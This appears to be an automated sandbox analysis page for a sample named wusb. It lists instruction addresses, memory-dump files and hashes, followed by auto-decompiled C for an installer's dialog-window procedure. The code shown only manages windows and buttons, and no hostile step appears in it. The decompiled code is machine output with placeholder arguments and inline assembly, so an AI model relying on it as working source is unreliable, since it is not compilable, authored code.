                                                        0x0040680d
                                                        0x00406810
                                                        0x00406812
                                                        0x00406813
                                                        0x00406816
                                                        0x00406818
                                                        0x00406819
                                                        0x0040681b
                                                        0x0040681e
                                                        0x00406823
                                                        0x00406828
                                                        0x00406831
                                                        0x00406844
                                                        0x00406847
                                                        0x00406853
                                                        0x0040687b
                                                        0x0040687d
                                                        0x0040688b
                                                        0x0040688b
                                                        0x0040688f
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x0040687f
                                                        0x0040687f
                                                        0x00406882
                                                        0x00406883
                                                        0x00406883
                                                        0x00000000
                                                        0x0040687f
                                                        0x00406859
                                                        0x0040685e
                                                        0x0040685e
                                                        0x00406867
                                                        0x0040686f
                                                        0x00406872
                                                        0x00000000
                                                        0x00406878
                                                        0x00406878
                                                        0x00000000
                                                        0x00406878
                                                        0x00000000
                                                        0x00406895
                                                        0x00406895
                                                        0x00406899
                                                        0x00407145
                                                        0x00000000
                                                        0x00407145
                                                        0x004068a2
                                                        0x004068b2
                                                        0x004068b5
                                                        0x004068b8
                                                        0x004068b8
                                                        0x004068b8
                                                        0x004068bb
                                                        0x004068bf
                                                        0x00000000
                                                        0x00000000
                                                        0x004068c1
                                                        0x004068c7
                                                        0x004068f1
                                                        0x004068f7
                                                        0x004068fe
                                                        0x00000000
                                                        0x004068fe
                                                        0x004068cd
                                                        0x004068d0
                                                        0x004068d5
                                                        0x004068d5
                                                        0x004068e0
                                                        0x004068e8
                                                        0x004068eb
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00406930
                                                        0x00406936
                                                        0x00406939
                                                        0x00406946
                                                        0x0040694e
                                                        0x00000000
                                                        0x00000000
                                                        0x00406905
                                                        0x00406905
                                                        0x00406909
                                                        0x00407154
                                                        0x00000000
                                                        0x00407154
                                                        0x00406915
                                                        0x00406920
                                                        0x00406920
                                                        0x00406920
                                                        0x00406923
                                                        0x00406926
                                                        0x00406929
                                                        0x0040692e
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00406bf5
                                                        0x00406bf9
                                                        0x00406c17
                                                        0x00406c1a
                                                        0x00406c21
                                                        0x00406c24
                                                        0x00406c27
                                                        0x00406c2a
                                                        0x00406c2d
                                                        0x00406c30
                                                        0x00406c32
                                                        0x00406c39
                                                        0x00406c3a
                                                        0x00406c3c
                                                        0x00406c3f
                                                        0x00406c42
                                                        0x00406c45
                                                        0x00406c45
                                                        0x00406c4a
                                                        0x00000000
                                                        0x00406c4a
                                                        0x00406bfb
                                                        0x00406bfe
                                                        0x00406c01
                                                        0x00406c0b
                                                        0x00000000
                                                        0x00000000
                                                        0x00406c5f
                                                        0x00406c63
                                                        0x00406c86
                                                        0x00406c89
                                                        0x00406c8c
                                                        0x00406c96
                                                        0x00406c65
                                                        0x00406c65
                                                        0x00406c68
                                                        0x00406c6b
                                                        0x00406c6e
                                                        0x00406c7b
                                                        0x00406c7e
                                                        0x00406c7e
                                                        0x00000000
                                                        0x00000000
                                                        0x00406ca2
                                                        0x00406ca6
                                                        0x00000000
                                                        0x00000000
                                                        0x00406cac
                                                        0x00406cb0
                                                        0x00000000
                                                        0x00000000
                                                        0x00406cb6
                                                        0x00406cb8
                                                        0x00406cbc
                                                        0x00406cbc
                                                        0x00406cbf
                                                        0x00406cc3
                                                        0x00000000
                                                        0x00000000
                                                        0x00406d13
                                                        0x00406d17
                                                        0x00406d1e
                                                        0x00406d21
                                                        0x00406d24
                                                        0x00406d2e
                                                        0x00000000
                                                        0x00406d2e
                                                        0x00406d19
                                                        0x00000000
                                                        0x00000000
                                                        0x00406d3a
                                                        0x00406d3e
                                                        0x00406d45
                                                        0x00406d48
                                                        0x00406d4b
                                                        0x00406d40
                                                        0x00406d40
                                                        0x00406d40
                                                        0x00406d4e
                                                        0x00406d51
                                                        0x00406d54
                                                        0x00406d54
                                                        0x00406d57
                                                        0x00406d5a
                                                        0x00406d5d
                                                        0x00406d5d
                                                        0x00406d60
                                                        0x00406d67
                                                        0x00406d6c
                                                        0x00000000
                                                        0x00000000
                                                        0x00406dfa
                                                        0x00406dfa
                                                        0x00406dfe
                                                        0x0040719c
                                                        0x00000000
                                                        0x0040719c
                                                        0x00406e04
                                                        0x00406e07
                                                        0x00406e0a
                                                        0x00406e0e
                                                        0x00406e11
                                                        0x00406e17
                                                        0x00406e19
                                                        0x00406e19
                                                        0x00406e19
                                                        0x00406e1c
                                                        0x00406e1f
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00406e7d
                                                        0x00406e7d
                                                        0x00406e81
                                                        0x004071a8
                                                        0x00000000
                                                        0x004071a8
                                                        0x00406e87
                                                        0x00406e8a
                                                        0x00406e8d
                                                        0x00406e91
                                                        0x00406e94
                                                        0x00406e9a
                                                        0x00406e9c
                                                        0x00406e9c
                                                        0x00406e9c
                                                        0x00406e9f
                                                        0x00000000
                                                        0x00000000
                                                        0x00406c4d
                                                        0x00406c4d
                                                        0x00406c50
                                                        0x00000000
                                                        0x00000000
                                                        0x00406f8c
                                                        0x00406f90
                                                        0x00406fb2
                                                        0x00406fb5
                                                        0x00406fbf
                                                        0x00000000
                                                        0x00406fbf
                                                        0x00406f92
                                                        0x00406f95
                                                        0x00406f99
                                                        0x00406f9c
                                                        0x00406f9c
                                                        0x00406f9f
                                                        0x00000000
                                                        0x00000000
                                                        0x00407049
                                                        0x0040704d
                                                        0x0040706b
                                                        0x0040706b
                                                        0x0040706b
                                                        0x00407072
                                                        0x00407079
                                                        0x00407080
                                                        0x00407080
                                                        0x00000000
                                                        0x00407080
                                                        0x0040704f
                                                        0x00407052
                                                        0x00407055
                                                        0x00407058
                                                        0x0040705f
                                                        0x00406fa3
                                                        0x00406fa3
                                                        0x00406fa6
                                                        0x00000000
                                                        0x00000000
                                                        0x0040713a
                                                        0x0040713d
                                                        0x00000000
                                                        0x00000000
                                                        0x00406d74
                                                        0x00406d76
                                                        0x00406d7d
                                                        0x00406d7e
                                                        0x00406d80
                                                        0x00406d83
                                                        0x00000000
                                                        0x00000000
                                                        0x00406d8b
                                                        0x00406d8e
                                                        0x00406d91
                                                        0x00406d93
                                                        0x00406d95
                                                        0x00406d95
                                                        0x00406d96
                                                        0x00406d99
                                                        0x00406da0
                                                        0x00406da3
                                                        0x00406db1
                                                        0x00000000
                                                        0x00000000
                                                        0x00407087
                                                        0x00407087
                                                        0x0040708a
                                                        0x00407091
                                                        0x00000000
                                                        0x00000000
                                                        0x00407096
                                                        0x00407096
                                                        0x0040709a
                                                        0x004071d2
                                                        0x00000000
                                                        0x004071d2
                                                        0x004070a0
                                                        0x004070a3
                                                        0x004070a6
                                                        0x004070aa
                                                        0x004070ad
                                                        0x004070b3
                                                        0x004070b5
                                                        0x004070b5
                                                        0x004070b5
                                                        0x004070b8
                                                        0x004070bb
                                                        0x004070bb
                                                        0x004070bb
                                                        0x004070bb
                                                        0x004070be
                                                        0x004070be
                                                        0x004070c2
                                                        0x00407122
                                                        0x00407125
                                                        0x0040712a
                                                        0x0040712b
                                                        0x0040712d
                                                        0x0040712f
                                                        0x00407132
                                                        0x00000000
                                                        0x00407132
                                                        0x004070c4
                                                        0x004070ca
                                                        0x004070cd
                                                        0x004070d0
                                                        0x004070d3
                                                        0x004070d6
                                                        0x004070d9
                                                        0x004070dc
                                                        0x004070df
                                                        0x004070e2
                                                        0x004070e5
                                                        0x004070fe
                                                        0x00407101
                                                        0x00407104
                                                        0x00407107
                                                        0x0040710b
                                                        0x0040710d
                                                        0x0040710d
                                                        0x0040710e
                                                        0x00407111
                                                        0x004070e7
                                                        0x004070e7
                                                        0x004070ef
                                                        0x004070f4
                                                        0x004070f6
                                                        0x004070f9
                                                        0x004070f9
                                                        0x00407114
                                                        0x0040711b
                                                        0x00000000
                                                        0x0040711d
                                                        0x00000000
                                                        0x0040711d
                                                        0x00000000
                                                        0x00406db9
                                                        0x00406dbc
                                                        0x00406df2
                                                        0x00406f22
                                                        0x00406f22
                                                        0x00406f22
                                                        0x00406f22
                                                        0x00406f25
                                                        0x00406f25
                                                        0x00406f28
                                                        0x00406f2a
                                                        0x004071b4
                                                        0x00000000
                                                        0x004071b4
                                                        0x00406f30
                                                        0x00406f33
                                                        0x00000000
                                                        0x00000000
                                                        0x00406f39
                                                        0x00406f3d
                                                        0x00406f40
                                                        0x00406f40
                                                        0x00406f40
                                                        0x00000000
                                                        0x00406f40
                                                        0x00406dbe
                                                        0x00406dc0
                                                        0x00406dc2
                                                        0x00406dc4
                                                        0x00406dc7
                                                        0x00406dc8
                                                        0x00406dca
                                                        0x00406dcc
                                                        0x00406dcf
                                                        0x00406dd2
                                                        0x00406de8
                                                        0x00406ded
                                                        0x00406e25
                                                        0x00406e25
                                                        0x00406e29
                                                        0x00406e55
                                                        0x00406e57
                                                        0x00406e5e
                                                        0x00406e61
                                                        0x00406e64
                                                        0x00406e64
                                                        0x00406e69
                                                        0x00406e69
                                                        0x00406e6b
                                                        0x00406e6e
                                                        0x00406e75
                                                        0x00406e78
                                                        0x00406ea5
                                                        0x00406ea5
                                                        0x00406ea8
                                                        0x00406eab
                                                        0x00406f1f
                                                        0x00406f1f
                                                        0x00406f1f
                                                        0x00000000
                                                        0x00406f1f
                                                        0x00406ead
                                                        0x00406eb3
                                                        0x00406eb6
                                                        0x00406eb9
                                                        0x00406ebc
                                                        0x00406ebf
                                                        0x00406ec2
                                                        0x00406ec5
                                                        0x00406ec8
                                                        0x00406ecb
                                                        0x00406ece
                                                        0x00406ee7
                                                        0x00406ee9
                                                        0x00406eec
                                                        0x00406eed
                                                        0x00406ef0
                                                        0x00406ef2
                                                        0x00406ef5
                                                        0x00406ef7
                                                        0x00406ef9
                                                        0x00406efc
                                                        0x00406efe
                                                        0x00406f01
                                                        0x00406f05
                                                        0x00406f07
                                                        0x00406f07
                                                        0x00406f08
                                                        0x00406f0b
                                                        0x00406f0e
                                                        0x00406ed0
                                                        0x00406ed0
                                                        0x00406ed8
                                                        0x00406edd
                                                        0x00406edf
                                                        0x00406ee2
                                                        0x00406ee2
                                                        0x00406f11
                                                        0x00406f18
                                                        0x00406ea2
                                                        0x00406ea2
                                                        0x00406ea2
                                                        0x00406ea2
                                                        0x00000000
                                                        0x00406f1a
                                                        0x00000000
                                                        0x00406f1a
                                                        0x00406f18
                                                        0x00406e2b
                                                        0x00406e2e
                                                        0x00406e30
                                                        0x00406e33
                                                        0x00406e36
                                                        0x00406e39
                                                        0x00406e3b
                                                        0x00406e3e
                                                        0x00406e41
                                                        0x00406e41
                                                        0x00406e44
                                                        0x00406e44
                                                        0x00406e47
                                                        0x00406e4e
                                                        0x00406e22
                                                        0x00406e22
                                                        0x00406e22
                                                        0x00406e22
                                                        0x00000000
                                                        0x00406e50
                                                        0x00000000
                                                        0x00406e50
                                                        0x00406e4e
                                                        0x00406dd4
                                                        0x00406dd7
                                                        0x00406dd9
                                                        0x00406ddc
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00406cc6
                                                        0x00406cc6
                                                        0x00406cca
                                                        0x00407190
                                                        0x00000000
                                                        0x00407190
                                                        0x00406cd0
                                                        0x00406cd3
                                                        0x00406cd6
                                                        0x00406cd9
                                                        0x00406cdb
                                                        0x00406cdb
                                                        0x00406cdb
                                                        0x00406cde
                                                        0x00406ce1
                                                        0x00406ce4
                                                        0x00406ce7
                                                        0x00406cea
                                                        0x00406ced
                                                        0x00406cee
                                                        0x00406cf0
                                                        0x00406cf0
                                                        0x00406cf0
                                                        0x00406cf3
                                                        0x00406cf6
                                                        0x00406cf9
                                                        0x00406cfc
                                                        0x00406cfc
                                                        0x00406cfc
                                                        0x00406cff
                                                        0x00000000
                                                        0x00000000
                                                        0x00406f43
                                                        0x00406f43
                                                        0x00406f43
                                                        0x00406f47
                                                        0x00000000
                                                        0x00000000
                                                        0x00406f4d
                                                        0x00406f50
                                                        0x00406f53
                                                        0x00406f56
                                                        0x00406f58
                                                        0x00406f58
                                                        0x00406f58
                                                        0x00406f5b
                                                        0x00406f5e
                                                        0x00406f61
                                                        0x00406f64
                                                        0x00406f67
                                                        0x00406f6a
                                                        0x00406f6b
                                                        0x00406f6d
                                                        0x00406f6d
                                                        0x00406f6d
                                                        0x00406f70
                                                        0x00406f73
                                                        0x00406f76
                                                        0x00406f79
                                                        0x00406f7c
                                                        0x00406f80
                                                        0x00406f82
                                                        0x00406f85
                                                        0x00000000
                                                        0x00406f87
                                                        0x00000000
                                                        0x00406f87
                                                        0x00406f85
                                                        0x004071ba
                                                        0x00000000
                                                        0x00000000
                                                        0x004067e9

                                                        Memory Dump Source
                                                        • Source File: 00000002.00000002.675584528.0000000000401000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true
                                                        • Associated: 00000002.00000002.675577432.0000000000400000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675601412.0000000000408000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.000000000040A000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000422000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000425000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000427000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.000000000042D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.0000000000435000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675606792.000000000044E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.0000000000450000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.0000000000460000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.0000000000469000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        • Associated: 00000002.00000002.675672594.000000000046F000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_2_2_400000_wusb.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 243907c00f3d7d55c33cca0d1e8b50e30fc2ef132c4317966eea85650a7ed6a7
                                                        • Instruction ID: dcd014b85e7262d3741248fa227238ad6671e2837142342cd84456719761ddbf
                                                        • Opcode Fuzzy Hash: 243907c00f3d7d55c33cca0d1e8b50e30fc2ef132c4317966eea85650a7ed6a7
                                                        • Instruction Fuzzy Hash: 7FF17871D04229CBCF18CFA8C8946ADBBB0FF44305F25856ED856BB281D7386A86CF45
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 00403D08 Relevance: 58.1, APIs: 32, Strings: 1, Instructions: 346windowstringCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 190 403d08-403d1a 191 403d20-403d26 190->191 192 403e5b-403e6a 190->192 191->192 193 403d2c-403d35 191->193 194 403eb9-403ece 192->194 195 403e6c-403ea7 GetDlgItem * 2 call 4041e1 KiUserCallbackDispatcher call 40140b 192->195 196 403d37-403d44 SetWindowPos 193->196 197 403d4a-403d4d 193->197 199 403ed0-403ed3 194->199 200 403f0e-403f13 call 40422d 194->200 216 403eac-403eb4 195->216 196->197 201 403d67-403d6d 197->201 202 403d4f-403d61 ShowWindow 197->202 204 403ed5-403ee0 call 401389 199->204 205 403f06-403f08 199->205 207 403f18-403f33 200->207 208 403d89-403d8c 201->208 209 403d6f-403d84 DestroyWindow 201->209 202->201 204->205 227 403ee2-403f01 SendMessageW 204->227 205->200 212 4041ae 205->212 213 403f35-403f37 call 40140b 207->213 214 403f3c-403f42 207->214 218 403d8e-403d9a SetWindowLongW 208->218 219 403d9f-403da5 208->219 215 40418b-404191 209->215 217 4041b0-4041b7 212->217 213->214 223 403f48-403f53 214->223 224 40416c-404185 DestroyWindow EndDialog 214->224 215->212 222 404193-404199 215->222 216->194 218->217 225 403e48-403e56 call 404248 219->225 226 403dab-403dbc GetDlgItem 219->226 222->212 228 40419b-4041a4 ShowWindow 222->228 223->224 229 403f59-403fa6 call 40626e call 4041e1 * 3 GetDlgItem 223->229 224->215 225->217 230 403ddb-403dde 226->230 231 403dbe-403dd5 SendMessageW IsWindowEnabled 226->231 227->217 228->212 260 403fb0-403fec ShowWindow KiUserCallbackDispatcher call 404203 EnableWindow 229->260 261 403fa8-403fad 229->261 235 403de0-403de1 230->235 236 403de3-403de6 230->236 231->212 231->230 238 403e11-403e16 call 4041ba 235->238 239 403df4-403df9 236->239 240 403de8-403dee 236->240 238->225 241 403dfb-403e01 239->241 242 403e2f-403e42 SendMessageW 239->242 240->242 245 403df0-403df2 240->245 246 403e03-403e09 call 40140b 241->246 247 403e18-403e21 call 40140b 241->247 242->225 245->238 256 403e0f 246->256 247->225 257 403e23-403e2d 247->257 256->238 257->256 264 403ff1 260->264 265 403fee-403fef 260->265 261->260 266 403ff3-404021 GetSystemMenu EnableMenuItem SendMessageW 264->266 265->266 267 404023-404034 SendMessageW 266->267 268 404036 266->268 269 40403c-40407b call 404216 call 403ce9 call 40624c lstrlenW call 40626e SetWindowTextW call 401389 267->269 268->269 269->207 280 404081-404083 269->280 280->207 281 404089-40408d 280->281 282 4040ac-4040c0 DestroyWindow 281->282 283 40408f-404095 281->283 282->215 285 4040c6-4040f3 CreateDialogParamW 282->285 283->212 284 40409b-4040a1 283->284 284->207 286 4040a7 284->286 285->215 287 4040f9-404150 call 4041e1 GetDlgItem GetWindowRect ScreenToClient SetWindowPos call 401389 285->287 286->212 287->212 292 404152-404165 ShowWindow call 40422d 287->292 294 40416a 292->294 294->215
                                                        C-Code - Quality: 83%
                                                        			E00403D08(struct HWND__* _a4, signed int _a8, int _a12, long _a16) {
				struct HWND__* _v32;
				void* _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t37;
				signed int _t39;
				signed int _t41;
				struct HWND__* _t51;
				signed int _t70;
				struct HWND__* _t76;
				signed int _t89;
				struct HWND__* _t94;
				signed int _t102;
				int _t106;
				signed int _t118;
				signed int _t119;
				int _t120;
				signed int _t125;
				struct HWND__* _t128;
				struct HWND__* _t129;
				int _t130;
				long _t133;
				int _t135;
				int _t136;
				void* _t137;
				void* _t144;

				_t118 = _a8;
				if(_t118 == 0x110 || _t118 == 0x408) {
					_t37 = _a12;
					_t128 = _a4;
					__eflags = _t118 - 0x110;
					 *0x4236d0 = _t37;
					if(_t118 == 0x110) {
						 *0x42a208 = _t128;
						 *0x4236e4 = GetDlgItem(_t128, 1);
						_t94 = GetDlgItem(_t128, 2);
						_push(0xffffffff);
						_push(0x1c);
						 *0x4216b0 = _t94;
						E004041E1(_t128);
						SetClassLongW(_t128, 0xfffffff2,  *0x4291e8); // executed
						 *0x4291cc = E0040140B(4);
						_t37 = 1;
						__eflags = 1;
						 *0x4236d0 = 1;
					}
					_t125 =  *0x40a368; // 0x0
					_t136 = 0;
					_t133 = (_t125 << 6) +  *0x42a240;
					__eflags = _t125;
					if(_t125 < 0) {
						L34:
						E0040422D(0x40b);
						while(1) {
							_t39 =  *0x4236d0;
							 *0x40a368 =  *0x40a368 + _t39;
							_t133 = _t133 + (_t39 << 6);
							_t41 =  *0x40a368; // 0x0
							__eflags = _t41 -  *0x42a244;
							if(_t41 ==  *0x42a244) {
								E0040140B(1);
							}
							__eflags =  *0x4291cc - _t136;
							if( *0x4291cc != _t136) {
								break;
							}
							__eflags =  *0x40a368 -  *0x42a244; // 0x0
							if(__eflags >= 0) {
								break;
							}
							_t119 =  *(_t133 + 0x14);
							E0040626E(_t119, _t128, _t133, 0x43a000,  *((intOrPtr*)(_t133 + 0x24)));
							_push( *((intOrPtr*)(_t133 + 0x20)));
							_push(0xfffffc19);
							E004041E1(_t128);
							_push( *((intOrPtr*)(_t133 + 0x1c)));
							_push(0xfffffc1b);
							E004041E1(_t128);
							_push( *((intOrPtr*)(_t133 + 0x28)));
							_push(0xfffffc1a);
							E004041E1(_t128);
							_t51 = GetDlgItem(_t128, 3);
							__eflags =  *0x42a2ac - _t136;
							_v32 = _t51;
							if( *0x42a2ac != _t136) {
								_t119 = _t119 & 0x0000fefd | 0x00000004;
								__eflags = _t119;
							}
							ShowWindow(_t51, _t119 & 0x00000008); // executed
							EnableWindow( *(_t137 + 0x30), _t119 & 0x00000100); // executed
							E00404203(_t119 & 0x00000002);
							_t120 = _t119 & 0x00000004;
							EnableWindow( *0x4216b0, _t120);
							__eflags = _t120 - _t136;
							if(_t120 == _t136) {
								_push(1);
							} else {
								_push(_t136);
							}
							EnableMenuItem(GetSystemMenu(_t128, _t136), 0xf060, ??);
							SendMessageW( *(_t137 + 0x38), 0xf4, _t136, 1);
							__eflags =  *0x42a2ac - _t136;
							if( *0x42a2ac == _t136) {
								_push( *0x4236e4);
							} else {
								SendMessageW(_t128, 0x401, 2, _t136);
								_push( *0x4216b0);
							}
							E00404216();
							E0040624C(0x4236e8, E00403CE9());
							E0040626E(0x4236e8, _t128, _t133,  &(0x4236e8[lstrlenW(0x4236e8)]),  *((intOrPtr*)(_t133 + 0x18)));
							SetWindowTextW(_t128, 0x4236e8); // executed
							_push(_t136);
							_t70 = E00401389( *((intOrPtr*)(_t133 + 8)));
							__eflags = _t70;
							if(_t70 != 0) {
								continue;
							} else {
								__eflags =  *_t133 - _t136;
								if( *_t133 == _t136) {
									continue;
								}
								__eflags =  *(_t133 + 4) - 5;
								if( *(_t133 + 4) != 5) {
									DestroyWindow( *0x4291d8); // executed
									 *0x4226c0 = _t133;
									__eflags =  *_t133 - _t136;
									if( *_t133 <= _t136) {
										goto L58;
									}
									_t76 = CreateDialogParamW( *0x42a200,  *_t133 +  *0x4291e0 & 0x0000ffff, _t128,  *( *(_t133 + 4) * 4 + "~C@"), _t133); // executed
									__eflags = _t76 - _t136;
									 *0x4291d8 = _t76;
									if(_t76 == _t136) {
										goto L58;
									}
									_push( *((intOrPtr*)(_t133 + 0x2c)));
									_push(6);
									E004041E1(_t76);
									GetWindowRect(GetDlgItem(_t128, 0x3fa), _t137 + 0x10);
									ScreenToClient(_t128, _t137 + 0x10);
									SetWindowPos( *0x4291d8, _t136,  *(_t137 + 0x20),  *(_t137 + 0x20), _t136, _t136, 0x15);
									_push(_t136);
									E00401389( *((intOrPtr*)(_t133 + 0xc)));
									__eflags =  *0x4291cc - _t136;
									if( *0x4291cc != _t136) {
										goto L61;
									}
									ShowWindow( *0x4291d8, 8); // executed
									E0040422D(0x405);
									goto L58;
								}
								__eflags =  *0x42a2ac - _t136;
								if( *0x42a2ac != _t136) {
									goto L61;
								}
								__eflags =  *0x42a2a0 - _t136;
								if( *0x42a2a0 != _t136) {
									continue;
								}
								goto L61;
							}
						}
						DestroyWindow( *0x4291d8);
						 *0x42a208 = _t136;
						EndDialog(_t128,  *0x421eb8);
						goto L58;
					} else {
						__eflags = _t37 - 1;
						if(_t37 != 1) {
							L33:
							__eflags =  *_t133 - _t136;
							if( *_t133 == _t136) {
								goto L61;
							}
							goto L34;
						}
						_push(0);
						_t89 = E00401389( *((intOrPtr*)(_t133 + 0x10)));
						__eflags = _t89;
						if(_t89 == 0) {
							goto L33;
						}
						SendMessageW( *0x4291d8, 0x40f, 0, 1);
						__eflags =  *0x4291cc;
						return 0 |  *0x4291cc == 0x00000000;
					}
				} else {
					_t128 = _a4;
					_t136 = 0;
					if(_t118 == 0x47) {
						SetWindowPos( *0x4236c8, _t128, 0, 0, 0, 0, 0x13);
					}
					if(_t118 == 5) {
						asm("sbb eax, eax");
						ShowWindow( *0x4236c8,  ~(_a12 - 1) & _t118);
					}
					if(_t118 != 0x40d) {
						__eflags = _t118 - 0x11;
						if(_t118 != 0x11) {
							__eflags = _t118 - 0x111;
							if(_t118 != 0x111) {
								L26:
								return E00404248(_t118, _a12, _a16);
							}
							_t135 = _a12 & 0x0000ffff;
							_t129 = GetDlgItem(_t128, _t135);
							__eflags = _t129 - _t136;
							if(_t129 == _t136) {
								L13:
								__eflags = _t135 - 1;
								if(_t135 != 1) {
									__eflags = _t135 - 3;
									if(_t135 != 3) {
										_t130 = 2;
										__eflags = _t135 - _t130;
										if(_t135 != _t130) {
											L25:
											SendMessageW( *0x4291d8, 0x111, _a12, _a16);
											goto L26;
										}
										__eflags =  *0x42a2ac - _t136;
										if( *0x42a2ac == _t136) {
											_t102 = E0040140B(3);
											__eflags = _t102;
											if(_t102 != 0) {
												goto L26;
											}
											 *0x421eb8 = 1;
											L21:
											_push(0x78);
											L22:
											E004041BA();
											goto L26;
										}
										E0040140B(_t130);
										 *0x421eb8 = _t130;
										goto L21;
									}
									__eflags =  *0x40a368 - _t136; // 0x0
									if(__eflags <= 0) {
										goto L25;
									}
									_push(0xffffffff);
									goto L22;
								}
								_push(_t135);
								goto L22;
							}
							SendMessageW(_t129, 0xf3, _t136, _t136);
							_t106 = IsWindowEnabled(_t129);
							__eflags = _t106;
							if(_t106 == 0) {
								goto L61;
							}
							goto L13;
						}
						SetWindowLongW(_t128, _t136, _t136);
						return 1;
					} else {
						DestroyWindow( *0x4291d8);
						 *0x4291d8 = _a12;
						L58:
						_t144 =  *0x4256e8 - _t136; // 0x1
						if(_t144 == 0 &&  *0x4291d8 != _t136) {
							ShowWindow(_t128, 0xa); // executed
							 *0x4256e8 = 1;
						}
						L61:
						return 0;
					}
				}
			}































                                                        0x00403d11
                                                        0x00403d1a
                                                        0x00403e5b
                                                        0x00403e5f
                                                        0x00403e63
                                                        0x00403e65
                                                        0x00403e6a
                                                        0x00403e75
                                                        0x00403e80
                                                        0x00403e85
                                                        0x00403e87
                                                        0x00403e89
                                                        0x00403e8c
                                                        0x00403e91
                                                        0x00403e9f
                                                        0x00403eac
                                                        0x00403eb3
                                                        0x00403eb3
                                                        0x00403eb4
                                                        0x00403eb4
                                                        0x00403eb9
                                                        0x00403ebf
                                                        0x00403ec6
                                                        0x00403ecc
                                                        0x00403ece
                                                        0x00403f0e
                                                        0x00403f13
                                                        0x00403f18
                                                        0x00403f18
                                                        0x00403f1d
                                                        0x00403f26
                                                        0x00403f28
                                                        0x00403f2d
                                                        0x00403f33
                                                        0x00403f37
                                                        0x00403f37
                                                        0x00403f3c
                                                        0x00403f42
                                                        0x00000000
                                                        0x00000000
                                                        0x00403f4d
                                                        0x00403f53
                                                        0x00000000
                                                        0x00000000
                                                        0x00403f5c
                                                        0x00403f64
                                                        0x00403f69
                                                        0x00403f6c
                                                        0x00403f72
                                                        0x00403f77
                                                        0x00403f7a
                                                        0x00403f80
                                                        0x00403f85
                                                        0x00403f88
                                                        0x00403f8e
                                                        0x00403f96
                                                        0x00403f9c
                                                        0x00403fa2
                                                        0x00403fa6
                                                        0x00403fad
                                                        0x00403fad
                                                        0x00403fad
                                                        0x00403fb7
                                                        0x00403fc9
                                                        0x00403fd5
                                                        0x00403fda
                                                        0x00403fe4
                                                        0x00403fea
                                                        0x00403fec
                                                        0x00403ff1
                                                        0x00403fee
                                                        0x00403fee
                                                        0x00403fee
                                                        0x00404001
                                                        0x00404019
                                                        0x0040401b
                                                        0x00404021
                                                        0x00404036
                                                        0x00404023
                                                        0x0040402c
                                                        0x0040402e
                                                        0x0040402e
                                                        0x0040403c
                                                        0x0040404d
                                                        0x00404063
                                                        0x0040406a
                                                        0x00404070
                                                        0x00404074
                                                        0x00404079
                                                        0x0040407b
                                                        0x00000000
                                                        0x00404081
                                                        0x00404081
                                                        0x00404083
                                                        0x00000000
                                                        0x00000000
                                                        0x00404089
                                                        0x0040408d
                                                        0x004040b2
                                                        0x004040b8
                                                        0x004040be
                                                        0x004040c0
                                                        0x00000000
                                                        0x00000000
                                                        0x004040e6
                                                        0x004040ec
                                                        0x004040ee
                                                        0x004040f3
                                                        0x00000000
                                                        0x00000000
                                                        0x004040f9
                                                        0x004040fc
                                                        0x004040ff
                                                        0x00404116
                                                        0x00404122
                                                        0x0040413b
                                                        0x00404141
                                                        0x00404145
                                                        0x0040414a
                                                        0x00404150
                                                        0x00000000
                                                        0x00000000
                                                        0x0040415a
                                                        0x00404165
                                                        0x00000000
                                                        0x00404165
                                                        0x0040408f
                                                        0x00404095
                                                        0x00000000
                                                        0x00000000
                                                        0x0040409b
                                                        0x004040a1
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x004040a7
                                                        0x0040407b
                                                        0x00404172
                                                        0x0040417e
                                                        0x00404185
                                                        0x00000000
                                                        0x00403ed0
                                                        0x00403ed0
                                                        0x00403ed3
                                                        0x00403f06
                                                        0x00403f06
                                                        0x00403f08
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x00403f08
                                                        0x00403ed5
                                                        0x00403ed9
                                                        0x00403ede
                                                        0x00403ee0
                                                        0x00000000
                                                        0x00000000
                                                        0x00403ef0
                                                        0x00403ef8
                                                        0x00000000
                                                        0x00403efe
                                                        0x00403d2c
                                                        0x00403d2c
                                                        0x00403d30
                                                        0x00403d35
                                                        0x00403d44
                                                        0x00403d44
                                                        0x00403d4d
                                                        0x00403d56
                                                        0x00403d61
                                                        0x00403d61
                                                        0x00403d6d
                                                        0x00403d89
                                                        0x00403d8c
